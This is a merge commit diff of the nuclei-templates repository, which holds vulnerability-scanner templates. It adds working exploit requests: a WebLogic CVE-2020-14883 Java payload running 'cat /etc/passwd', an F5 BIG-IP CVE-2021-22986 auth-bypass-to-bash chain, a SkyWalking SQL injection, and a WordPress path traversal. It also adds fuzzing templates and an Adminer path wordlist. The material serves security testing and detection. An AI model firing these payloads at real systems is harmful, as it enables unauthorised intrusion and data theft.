Merge pull request #31 from projectdiscovery/master

Updation
2021-03-24 14:49:04 +05:30 · 2021-03-24 14:49:04 +05:30 · cfb7aa0a45
parent c686b26b02 c141c32cab
commit cfb7aa0a45
24 changed files with 58807 additions and 26 deletions
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@ -9,17 +9,13 @@
 # and that doesn't mean nuclei won't let you run these templates. if you know what you are doing, feel free to updates this list locally as per your need.
 #
 # This list also can be used to ignore templates that you wanted to exclude from every scan.
-# More details - https://github.com/projectdiscovery/nuclei#using-nuclei-ignore-file-for-template-exclusion
+# More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion

 .pre-commit-config.yaml

 # Fuzzing is excluded to avoid running bruteforce on every server as default.
 fuzzing/
-
-# Wordlist directory contains payload to be used with templates. 
 helpers/
 miscellaneous/
 headless/
-# Workflows are excluded from default run to avoid duplicate scans.
-workflows/
 iot/
--- a/README.md
+++ b/README.md
@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc

 | Templates        | Counts                         | Templates       | Counts                          | Templates      | Counts                       |
 | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves             | 249           | vulnerabilities | 114 | exposed-panels | 107 |
+| cves             | 253           | vulnerabilities | 116 | exposed-panels | 108 |
 | takeovers        | 65        | exposures       | 63       | technologies   | 51   |
-| misconfiguration | 53 | workflows       | 24         | miscellaneous  | 16  |
+| misconfiguration | 54 | workflows       | 24         | miscellaneous  | 16  |
 | default-logins   | 20 | exposed-tokens  | 9  | dns            | 8            |
-| fuzzing          | 4          | helpers         | 2         | iot            | 6            |
+| fuzzing          | 6          | helpers         | 4         | iot            | 7            |

-**78 directories, 816 files**.
+**79 directories, 830 files**.

 </td>
 </tr>
--- a/cves/2017/CVE-2017-1000170.yaml
+++ b/cves/2017/CVE-2017-1000170.yaml
@ -0,0 +1,26 @@
+id: CVE-2017-1000170
+
+info:
+  name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal
+  author: dwisiswant0
+  severity: high
+  reference: https://www.exploit-db.com/exploits/49693
+  description: jqueryFileTree 2.1.5 and older Directory Traversal
+  tags: cve,cve2017,wordpress,wp-plugin,lfi
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"
+    body: "dir=%2Fetc%2F&onlyFiles=true"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<li class='file ext_passwd'>"
+          - "<a rel='/passwd'>passwd</a></li>"
+        condition: and
+        part: body
+      - type: status
+        status:
+          - 200
--- a/cves/2020/CVE-2020-10547.yaml
+++ b/cves/2020/CVE-2020-10547.yaml
@ -3,7 +3,10 @@ info:
  name: rConfig 3.9.4 SQLi
  author: madrobot
  severity: high
-  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10547
+  description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
+  reference:
+    https://github.com/theguly/exploits/blob/master/CVE-2020-10547.py
+    https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
  tags: cve,cve2020,rconfig,sqli

 requests:
--- a/cves/2020/CVE-2020-11034.yaml
+++ b/cves/2020/CVE-2020-11034.yaml
@ -4,6 +4,7 @@ info:
  name: GLPI v.9.4.6 - Open redirect
  author: pikpikcu
  severity: low
+  description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6.
  reference: |
   - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
   - https://github.com/glpi-project/glpi/archive/9.4.6.zip
--- a/cves/2020/CVE-2020-14883.yaml
+++ b/cves/2020/CVE-2020-14883.yaml
@ -0,0 +1,32 @@
+id: CVE-2020-14883
+
+info:
+  name: Oracle WebLogic Server Administration Console Handle RCE
+  author: pdteam
+  severity: critical
+  description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
+  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883
+  tags: cve,cve2020,oracle,rce,weblogic
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/console/images/%252e%252e%252fconsole.portal"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+      Test-Header: cat /etc/passwd
+
+    body: |
+        test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/cves/2020/CVE-2020-4463.yaml
+++ b/cves/2020/CVE-2020-4463.yaml
@ -10,7 +10,7 @@ info:
    A remote attacker could exploit this vulnerability to expose
    sensitive information or consume memory resources.

-    References:
+  references: |
    - https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463
    - https://github.com/Ibonok/CVE-2020-4463
  tags: cve,cve2020,ibm,xxe
--- a/cves/2020/CVE-2020-5284.yaml
+++ b/cves/2020/CVE-2020-5284.yaml
@ -4,7 +4,11 @@ info:
  name: Next.js .next/ limited path traversal
  author: Harsh & Rahul & dwisiswant0
  severity: medium
+  description: Next.js versions before 9.3.2 have a directory traversal vulnerability. Attackers could craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. This issue is fixed in version 9.3.2.
  tags: cve,cve2020,nextjs,lfi
+  reference:
+    https://github.com/zeit/next.js/releases/tag/v9.3.2
+    https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj

 requests:
  - method: GET
--- a/cves/2020/CVE-2020-5410.yaml
+++ b/cves/2020/CVE-2020-5410.yaml
@ -4,6 +4,8 @@ info:
  name: Directory Traversal in Spring Cloud Config Server
  author: mavericknerd
  severity: high
+  description: Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack.
+  reference: https://tanzu.vmware.com/security/cve-2020-5410
  tags: cve,cve2020,lfi,springcloud

 requests:
--- a/cves/2020/CVE-2020-5412.yaml
+++ b/cves/2020/CVE-2020-5412.yaml
@ -6,6 +6,7 @@ info:
  severity: medium
  description: Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6, and older unsupported versions allow applications to use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. A malicious user, or attacker, can send a request to other servers that should not be exposed publicly.
  tags: cve,cve2020,ssrf,springcloud
+  reference: https://tanzu.vmware.com/security/cve-2020-5412

 requests:
  - method: GET
--- a/cves/2020/CVE-2020-9047.yaml
+++ b/cves/2020/CVE-2020-9047.yaml
@ -16,8 +16,10 @@ info:
    download and run a malicious executable that
    could allow OS command injection on the system.

-    Source/References:
+  reference: |
    - https://github.com/norrismw/CVE-2020-9047
+    - https://www.johnsoncontrols.com/cyber-solutions/security-advisories
+    - https://www.us-cert.gov/ics/advisories/ICSA-20-170-01
  tags: cve,cve2020,rce

 requests:
--- a/cves/2020/CVE-2020-9483.yaml
+++ b/cves/2020/CVE-2020-9483.yaml
@ -0,0 +1,36 @@
+id: CVE-2020-9483
+
+info:
+  name: SkyWalking SQLI
+  author: pikpikcu
+  severity: high
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9483
+  tags: cve,cve2020,sqli,skywalking
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/graphql"
+    headers:
+      Content-Type: application/json
+    body: |
+      {"query":"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\"all_p99\",id:\"') UNION SELECT 1,CONCAT('~','9999999999','~')-- \",}, duration: $d){values{value}}}","variables":{"d":{"start":"2021-11-11","end":"2021-11-12","step":"DAY"}}}
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "Content-Type: application/json"
+        part: header
+
+      - type: word
+        words:
+          - "UNION SELECT 1,CONCAT('~','9999999999','~')--"
+          - 'Exception while fetching data'
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/cves/2021/CVE-2021-22986.yaml
+++ b/cves/2021/CVE-2021-22986.yaml
@ -0,0 +1,52 @@
+id: CVE-2021-22986
+info:
+  name: F5 BIG-IP iControl REST unauthenticated RCE
+  author: Harsh Jaiswal (@rootxharsh) & Rahul Maini (@iamnoooob)
+  severity: critical
+  tags: bigip,cve,cve2021,rce
+  description: The iControl REST interface has an unauthenticated remote command execution vulnerability.
+  reference: https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986
+  advisory: https://support.f5.com/csp/article/K03009991
+
+requests:
+  - raw:
+      - |
+        POST /mgmt/shared/authn/login HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Language: en
+        Authorization: Basic YWRtaW46
+        Content-Type: application/json
+        Cookie: BIGIPAuthCookie=1234
+        Connection: close
+
+        {"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
+      - |
+        POST /mgmt/tm/util/bash HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Language: en
+        X-F5-Auth-Token: §token§
+        Content-Type: application/json
+        Connection: close
+
+        {"command":"run","utilCmdArgs":"-c id"}
+
+    extractors:
+      - type: regex
+        part: body
+        internal: true
+        name: token
+        group: 1
+        regex:
+          - "([A-Z0-9]{26})"
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - "\"commandResult\":\"(.*)\""
+
+    matchers:
+      - type: word
+        words:
+          - "commandResult"
+          - "uid="
+        condition: and
--- a/fuzzing/adminer-panel-fuzz.yaml
+++ b/fuzzing/adminer-panel-fuzz.yaml
@ -0,0 +1,46 @@
+id: adminer-panel-fuzz
+info:
+  name: Adminer Login Panel Fuzz
+  author: random-robbie & meme-lord
+  severity: info
+  reference: https://blog.sorcery.ie/posts/adminer/
+  tags: fuzz,adminer
+
+  # <= 4.2.4 can have unauthenticated RCE via SQLite driver
+  # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL
+  # Most versions have some kind of SSRF usability
+  # Is generally handy if you find SQL creds
+
+requests:
+
+  - payloads:
+      path: helpers/wordlists/adminer-paths.txt
+
+    attack: sniper
+    threads: 50
+
+    raw:
+      - |
+        GET {{path}} HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/plain, */*
+        Accept-Language: en-US,en;q=0.5
+        Referer: {{BaseURL}}
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "Login - Adminer"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '<span class="version">([0-9.]+)'
--- a/fuzzing/wp-plugin-scan.yaml
+++ b/fuzzing/wp-plugin-scan.yaml
@ -0,0 +1,34 @@
+id: wp-plugin-scan
+info:
+  name: Wordpress Plugin Scanner
+  author: pdteam
+  severity: info
+  description: Wordlist based wordpress plugin scanner.
+  reference: https://github.com/RandomRobbieBF/wordpress-plugin-list
+  tags: fuzz
+
+requests:
+
+  - payloads:
+      plugin_wordlist: helpers/wordlists/wp-plugins.txt
+
+    attack: sniper
+    threads: 50
+
+    raw:
+      - |
+        GET {{plugin_wordlist}} HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/plain, */*
+        Accept-Language: en-US,en;q=0.5
+        Referer: {{BaseURL}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "== Description =="
--- a/helpers/wordlists/adminer-paths.txt
+++ b/helpers/wordlists/adminer-paths.txt
@ -0,0 +1,741 @@
+/_adminer.php
+/adm.php
+/admin/adminer.php
+/adminer-2.0.0.php
+/adminer-2.1.0.php
+/adminer-2.2.0.php
+/adminer-2.2.1.php
+/adminer-2.3.0.php
+/adminer-2.3.2.php
+/adminer-3.0.0.php
+/adminer-3.0.1-en.php
+/adminer-3.0.1-mysql-en.php
+/adminer-3.0.1-mysql.php
+/adminer-3.0.1.php
+/adminer-3.0.1/
+/adminer-3.1.0-en.php
+/adminer-3.1.0-mysql-en.php
+/adminer-3.1.0-mysql.php
+/adminer-3.1.0.php
+/adminer-3.1.0/
+/adminer-3.2.0-en.php
+/adminer-3.2.0-mysql-en.php
+/adminer-3.2.0-mysql.php
+/adminer-3.2.0.php
+/adminer-3.2.0/
+/adminer-3.2.1.php
+/adminer-3.2.2-en.php
+/adminer-3.2.2-mysql-en.php
+/adminer-3.2.2-mysql.php
+/adminer-3.2.2.php
+/adminer-3.2.2/
+/adminer-3.3.0-en.php
+/adminer-3.3.0-mysql-en.php
+/adminer-3.3.0-mysql.php
+/adminer-3.3.0.php
+/adminer-3.3.0/
+/adminer-3.3.1-en.php
+/adminer-3.3.1-mysql-en.php
+/adminer-3.3.1-mysql.php
+/adminer-3.3.1.php
+/adminer-3.3.1/
+/adminer-3.3.2.php
+/adminer-3.3.3-en.php
+/adminer-3.3.3-mysql-en.php
+/adminer-3.3.3-mysql.php
+/adminer-3.3.3.php
+/adminer-3.3.3/
+/adminer-3.3.4-en.php
+/adminer-3.3.4-mysql-en.php
+/adminer-3.3.4-mysql.php
+/adminer-3.3.4.php
+/adminer-3.3.4/
+/adminer-3.4.0-en.php
+/adminer-3.4.0-mysql-en.php
+/adminer-3.4.0-mysql.php
+/adminer-3.4.0.php
+/adminer-3.4.0/
+/adminer-3.5.0.php
+/adminer-3.5.1-en.php
+/adminer-3.5.1-mysql-en.php
+/adminer-3.5.1-mysql.php
+/adminer-3.5.1.php
+/adminer-3.5.1/
+/adminer-3.6.0.php
+/adminer-3.6.1-en.php
+/adminer-3.6.1-mysql-en.php
+/adminer-3.6.1-mysql.php
+/adminer-3.6.1.php
+/adminer-3.6.1/
+/adminer-3.6.2-en.php
+/adminer-3.6.2-mysql-en.php
+/adminer-3.6.2-mysql.php
+/adminer-3.6.2.php
+/adminer-3.6.2/
+/adminer-3.6.3-en.php
+/adminer-3.6.3-mysql-en.php
+/adminer-3.6.3-mysql.php
+/adminer-3.6.3.php
+/adminer-3.6.3/
+/adminer-3.6.4-en.php
+/adminer-3.6.4-mysql-en.php
+/adminer-3.6.4-mysql.php
+/adminer-3.6.4.php
+/adminer-3.6.4/
+/adminer-3.7.0-en.php
+/adminer-3.7.0-mysql-en.php
+/adminer-3.7.0-mysql.php
+/adminer-3.7.0.php
+/adminer-3.7.0/
+/adminer-3.7.1-en.php
+/adminer-3.7.1-mysql-en.php
+/adminer-3.7.1-mysql.php
+/adminer-3.7.1.php
+/adminer-3.7.1/
+/adminer-4.0.0.php
+/adminer-4.0.1-en.php
+/adminer-4.0.1-mysql-en.php
+/adminer-4.0.1-mysql.php
+/adminer-4.0.1.php
+/adminer-4.0.1/
+/adminer-4.0.2-en.php
+/adminer-4.0.2-mysql-en.php
+/adminer-4.0.2-mysql.php
+/adminer-4.0.2.php
+/adminer-4.0.2/
+/adminer-4.0.3-en.php
+/adminer-4.0.3-mysql-en.php
+/adminer-4.0.3-mysql.php
+/adminer-4.0.3.php
+/adminer-4.0.3/
+/adminer-4.1.0-en.php
+/adminer-4.1.0-mysql-en.php
+/adminer-4.1.0-mysql.php
+/adminer-4.1.0.php
+/adminer-4.1.0/
+/adminer-4.2.0-en.php
+/adminer-4.2.0-mysql-en.php
+/adminer-4.2.0-mysql.php
+/adminer-4.2.0.php
+/adminer-4.2.0/
+/adminer-4.2.1-en.php
+/adminer-4.2.1-mysql-en.php
+/adminer-4.2.1-mysql.php
+/adminer-4.2.1.php
+/adminer-4.2.1/
+/adminer-4.2.2-en.php
+/adminer-4.2.2-mysql-en.php
+/adminer-4.2.2-mysql.php
+/adminer-4.2.2.php
+/adminer-4.2.2/
+/adminer-4.2.3-en.php
+/adminer-4.2.3-mysql-en.php
+/adminer-4.2.3-mysql.php
+/adminer-4.2.3.php
+/adminer-4.2.3/
+/adminer-4.2.4-en.php
+/adminer-4.2.4-mysql-en.php
+/adminer-4.2.4-mysql.php
+/adminer-4.2.4.php
+/adminer-4.2.4/
+/adminer-4.2.5-cs.php
+/adminer-4.2.5-de.php
+/adminer-4.2.5-en.php
+/adminer-4.2.5-mysql-cs.php
+/adminer-4.2.5-mysql-de.php
+/adminer-4.2.5-mysql-en.php
+/adminer-4.2.5-mysql-pl.php
+/adminer-4.2.5-mysql-sk.php
+/adminer-4.2.5-mysql.php
+/adminer-4.2.5-pl.php
+/adminer-4.2.5-sk.php
+/adminer-4.2.5.php
+/adminer-4.2.5/
+/adminer-4.3.0-cs.php
+/adminer-4.3.0-de.php
+/adminer-4.3.0-en.php
+/adminer-4.3.0-mysql-cs.php
+/adminer-4.3.0-mysql-de.php
+/adminer-4.3.0-mysql-en.php
+/adminer-4.3.0-mysql-pl.php
+/adminer-4.3.0-mysql-sk.php
+/adminer-4.3.0-mysql.php
+/adminer-4.3.0-pl.php
+/adminer-4.3.0-sk.php
+/adminer-4.3.0.php
+/adminer-4.3.0/
+/adminer-4.3.1-cs.php
+/adminer-4.3.1-de.php
+/adminer-4.3.1-en.php
+/adminer-4.3.1-mysql-cs.php
+/adminer-4.3.1-mysql-de.php
+/adminer-4.3.1-mysql-en.php
+/adminer-4.3.1-mysql-pl.php
+/adminer-4.3.1-mysql-sk.php
+/adminer-4.3.1-mysql.php
+/adminer-4.3.1-pl.php
+/adminer-4.3.1-sk.php
+/adminer-4.3.1.php
+/adminer-4.3.1/
+/adminer-4.4.0-cs.php
+/adminer-4.4.0-de.php
+/adminer-4.4.0-en.php
+/adminer-4.4.0-mysql-cs.php
+/adminer-4.4.0-mysql-de.php
+/adminer-4.4.0-mysql-en.php
+/adminer-4.4.0-mysql-pl.php
+/adminer-4.4.0-mysql-sk.php
+/adminer-4.4.0-mysql.php
+/adminer-4.4.0-pl.php
+/adminer-4.4.0-sk.php
+/adminer-4.4.0.php
+/adminer-4.4.0/
+/adminer-4.5.0-cs.php
+/adminer-4.5.0-de.php
+/adminer-4.5.0-en.php
+/adminer-4.5.0-mysql-cs.php
+/adminer-4.5.0-mysql-de.php
+/adminer-4.5.0-mysql-en.php
+/adminer-4.5.0-mysql-pl.php
+/adminer-4.5.0-mysql-sk.php
+/adminer-4.5.0-mysql.php
+/adminer-4.5.0-pl.php
+/adminer-4.5.0-sk.php
+/adminer-4.5.0.php
+/adminer-4.5.0/
+/adminer-4.6.0-cs.php
+/adminer-4.6.0-de.php
+/adminer-4.6.0-en.php
+/adminer-4.6.0-mysql-cs.php
+/adminer-4.6.0-mysql-de.php
+/adminer-4.6.0-mysql-en.php
+/adminer-4.6.0-mysql-pl.php
+/adminer-4.6.0-mysql-sk.php
+/adminer-4.6.0-mysql.php
+/adminer-4.6.0-pl.php
+/adminer-4.6.0-sk.php
+/adminer-4.6.0.php
+/adminer-4.6.0/
+/adminer-4.6.1-cs.php
+/adminer-4.6.1-de.php
+/adminer-4.6.1-en.php
+/adminer-4.6.1-mysql-cs.php
+/adminer-4.6.1-mysql-de.php
+/adminer-4.6.1-mysql-en.php
+/adminer-4.6.1-mysql-pl.php
+/adminer-4.6.1-mysql-sk.php
+/adminer-4.6.1-mysql.php
+/adminer-4.6.1-pl.php
+/adminer-4.6.1-sk.php
+/adminer-4.6.1.php
+/adminer-4.6.1/
+/adminer-4.6.2-cs.php
+/adminer-4.6.2-de.php
+/adminer-4.6.2-en.php
+/adminer-4.6.2-mysql-cs.php
+/adminer-4.6.2-mysql-de.php
+/adminer-4.6.2-mysql-en.php
+/adminer-4.6.2-mysql-pl.php
+/adminer-4.6.2-mysql-sk.php
+/adminer-4.6.2-mysql.php
+/adminer-4.6.2-pl.php
+/adminer-4.6.2-sk.php
+/adminer-4.6.2.php
+/adminer-4.6.2/
+/adminer-4.6.3-cs.php
+/adminer-4.6.3-de.php
+/adminer-4.6.3-en.php
+/adminer-4.6.3-mysql-cs.php
+/adminer-4.6.3-mysql-de.php
+/adminer-4.6.3-mysql-en.php
+/adminer-4.6.3-mysql-pl.php
+/adminer-4.6.3-mysql-sk.php
+/adminer-4.6.3-mysql.php
+/adminer-4.6.3-pl.php
+/adminer-4.6.3-sk.php
+/adminer-4.6.3.php
+/adminer-4.6.3/
+/adminer-4.7.0-cs.php
+/adminer-4.7.0-de.php
+/adminer-4.7.0-en.php
+/adminer-4.7.0-mysql-cs.php
+/adminer-4.7.0-mysql-de.php
+/adminer-4.7.0-mysql-en.php
+/adminer-4.7.0-mysql-pl.php
+/adminer-4.7.0-mysql-sk.php
+/adminer-4.7.0-mysql.php
+/adminer-4.7.0-pl.php
+/adminer-4.7.0-sk.php
+/adminer-4.7.0.php
+/adminer-4.7.0/
+/adminer-4.7.1-cs.php
+/adminer-4.7.1-de.php
+/adminer-4.7.1-en.php
+/adminer-4.7.1-mysql-cs.php
+/adminer-4.7.1-mysql-de.php
+/adminer-4.7.1-mysql-en.php
+/adminer-4.7.1-mysql-pl.php
+/adminer-4.7.1-mysql-sk.php
+/adminer-4.7.1-mysql.php
+/adminer-4.7.1-pl.php
+/adminer-4.7.1-sk.php
+/adminer-4.7.1.php
+/adminer-4.7.1/
+/adminer-4.7.2-cs.php
+/adminer-4.7.2-de.php
+/adminer-4.7.2-en.php
+/adminer-4.7.2-mysql-cs.php
+/adminer-4.7.2-mysql-de.php
+/adminer-4.7.2-mysql-en.php
+/adminer-4.7.2-mysql-pl.php
+/adminer-4.7.2-mysql-sk.php
+/adminer-4.7.2-mysql.php
+/adminer-4.7.2-pl.php
+/adminer-4.7.2-sk.php
+/adminer-4.7.2.php
+/adminer-4.7.2/
+/adminer-4.7.3-cs.php
+/adminer-4.7.3-de.php
+/adminer-4.7.3-en.php
+/adminer-4.7.3-mysql-cs.php
+/adminer-4.7.3-mysql-de.php
+/adminer-4.7.3-mysql-en.php
+/adminer-4.7.3-mysql-pl.php
+/adminer-4.7.3-mysql-sk.php
+/adminer-4.7.3-mysql.php
+/adminer-4.7.3-pl.php
+/adminer-4.7.3-sk.php
+/adminer-4.7.3.php
+/adminer-4.7.3/
+/adminer-4.7.4-cs.php
+/adminer-4.7.4-de.php
+/adminer-4.7.4-en.php
+/adminer-4.7.4-mysql-cs.php
+/adminer-4.7.4-mysql-de.php
+/adminer-4.7.4-mysql-en.php
+/adminer-4.7.4-mysql-pl.php
+/adminer-4.7.4-mysql-sk.php
+/adminer-4.7.4-mysql.php
+/adminer-4.7.4-pl.php
+/adminer-4.7.4-sk.php
+/adminer-4.7.4.php
+/adminer-4.7.4/
+/adminer-4.7.5-cs.php
+/adminer-4.7.5-de.php
+/adminer-4.7.5-en.php
+/adminer-4.7.5-mysql-cs.php
+/adminer-4.7.5-mysql-de.php
+/adminer-4.7.5-mysql-en.php
+/adminer-4.7.5-mysql-pl.php
+/adminer-4.7.5-mysql-sk.php
+/adminer-4.7.5-mysql.php
+/adminer-4.7.5-pl.php
+/adminer-4.7.5-sk.php
+/adminer-4.7.5.php
+/adminer-4.7.5/
+/adminer-4.7.6-cs.php
+/adminer-4.7.6-de.php
+/adminer-4.7.6-en.php
+/adminer-4.7.6-mysql-cs.php
+/adminer-4.7.6-mysql-de.php
+/adminer-4.7.6-mysql-en.php
+/adminer-4.7.6-mysql-pl.php
+/adminer-4.7.6-mysql-sk.php
+/adminer-4.7.6-mysql.php
+/adminer-4.7.6-pl.php
+/adminer-4.7.6-sk.php
+/adminer-4.7.6.php
+/adminer-4.7.6/
+/adminer-4.7.7-cs.php
+/adminer-4.7.7-de.php
+/adminer-4.7.7-en.php
+/adminer-4.7.7-mysql-cs.php
+/adminer-4.7.7-mysql-de.php
+/adminer-4.7.7-mysql-en.php
+/adminer-4.7.7-mysql-pl.php
+/adminer-4.7.7-mysql-sk.php
+/adminer-4.7.7-mysql.php
+/adminer-4.7.7-pl.php
+/adminer-4.7.7-sk.php
+/adminer-4.7.7.php
+/adminer-4.7.7/
+/adminer-4.7.8-cs.php
+/adminer-4.7.8-de.php
+/adminer-4.7.8-en.php
+/adminer-4.7.8-mysql-cs.php
+/adminer-4.7.8-mysql-de.php
+/adminer-4.7.8-mysql-en.php
+/adminer-4.7.8-mysql-pl.php
+/adminer-4.7.8-mysql-sk.php
+/adminer-4.7.8-mysql.php
+/adminer-4.7.8-pl.php
+/adminer-4.7.8-sk.php
+/adminer-4.7.8.php
+/adminer-4.7.8/
+/adminer-4.7.9-cs.php
+/adminer-4.7.9-de.php
+/adminer-4.7.9-en.php
+/adminer-4.7.9-mysql-cs.php
+/adminer-4.7.9-mysql-de.php
+/adminer-4.7.9-mysql-en.php
+/adminer-4.7.9-mysql-pl.php
+/adminer-4.7.9-mysql-sk.php
+/adminer-4.7.9-mysql.php
+/adminer-4.7.9-pl.php
+/adminer-4.7.9-sk.php
+/adminer-4.7.9.php
+/adminer-4.7.9/
+/adminer-4.8.0-cs.php
+/adminer-4.8.0-de.php
+/adminer-4.8.0-en.php
+/adminer-4.8.0-mysql-cs.php
+/adminer-4.8.0-mysql-de.php
+/adminer-4.8.0-mysql-en.php
+/adminer-4.8.0-mysql-pl.php
+/adminer-4.8.0-mysql-sk.php
+/adminer-4.8.0-mysql.php
+/adminer-4.8.0-pl.php
+/adminer-4.8.0-sk.php
+/adminer-4.8.0.php
+/adminer-4.8.0/
+/adminer-mysql.php
+/adminer.php
+/adminer/
+/adminer/adminer.php
+/adminer1.php
+/data/adminer.php
+/editor-3.0.1-mysql-en.php
+/editor-3.0.1-mysql.php
+/editor-3.0.1.php
+/editor-3.1.0-mysql-en.php
+/editor-3.1.0-mysql.php
+/editor-3.1.0.php
+/editor-3.2.0-mysql-en.php
+/editor-3.2.0-mysql.php
+/editor-3.2.0.php
+/editor-3.2.2-mysql-en.php
+/editor-3.2.2-mysql.php
+/editor-3.2.2.php
+/editor-3.3.0-mysql-en.php
+/editor-3.3.0-mysql.php
+/editor-3.3.0.php
+/editor-3.3.1-mysql-en.php
+/editor-3.3.1-mysql.php
+/editor-3.3.1.php
+/editor-3.3.3-mysql-en.php
+/editor-3.3.3-mysql.php
+/editor-3.3.3.php
+/editor-3.3.4-mysql-en.php
+/editor-3.3.4-mysql.php
+/editor-3.3.4.php
+/editor-3.4.0-mysql-en.php
+/editor-3.4.0-mysql.php
+/editor-3.4.0.php
+/editor-3.5.1-mysql-en.php
+/editor-3.5.1-mysql.php
+/editor-3.5.1.php
+/editor-3.6.1-mysql-en.php
+/editor-3.6.1-mysql.php
+/editor-3.6.1.php
+/editor-3.6.2-mysql-en.php
+/editor-3.6.2-mysql.php
+/editor-3.6.2.php
+/editor-3.6.3-mysql-en.php
+/editor-3.6.3-mysql.php
+/editor-3.6.3.php
+/editor-3.6.4-mysql-en.php
+/editor-3.6.4-mysql.php
+/editor-3.6.4.php
+/editor-3.7.0-mysql-en.php
+/editor-3.7.0-mysql.php
+/editor-3.7.0.php
+/editor-3.7.1-mysql-en.php
+/editor-3.7.1-mysql.php
+/editor-3.7.1.php
+/editor-4.0.1-en.php
+/editor-4.0.1-mysql-en.php
+/editor-4.0.1-mysql.php
+/editor-4.0.1.php
+/editor-4.0.2-en.php
+/editor-4.0.2-mysql-en.php
+/editor-4.0.2-mysql.php
+/editor-4.0.2.php
+/editor-4.0.3-en.php
+/editor-4.0.3-mysql-en.php
+/editor-4.0.3-mysql.php
+/editor-4.0.3.php
+/editor-4.1.0-en.php
+/editor-4.1.0-mysql-en.php
+/editor-4.1.0-mysql.php
+/editor-4.1.0.php
+/editor-4.2.0-en.php
+/editor-4.2.0-mysql-en.php
+/editor-4.2.0-mysql.php
+/editor-4.2.0.php
+/editor-4.2.1-en.php
+/editor-4.2.1-mysql-en.php
+/editor-4.2.1-mysql.php
+/editor-4.2.1.php
+/editor-4.2.2-en.php
+/editor-4.2.2-mysql-en.php
+/editor-4.2.2-mysql.php
+/editor-4.2.2.php
+/editor-4.2.3-en.php
+/editor-4.2.3-mysql-en.php
+/editor-4.2.3-mysql.php
+/editor-4.2.3.php
+/editor-4.2.4-en.php
+/editor-4.2.4-mysql-en.php
+/editor-4.2.4-mysql.php
+/editor-4.2.4.php
+/editor-4.2.5-cs.php
+/editor-4.2.5-de.php
+/editor-4.2.5-en.php
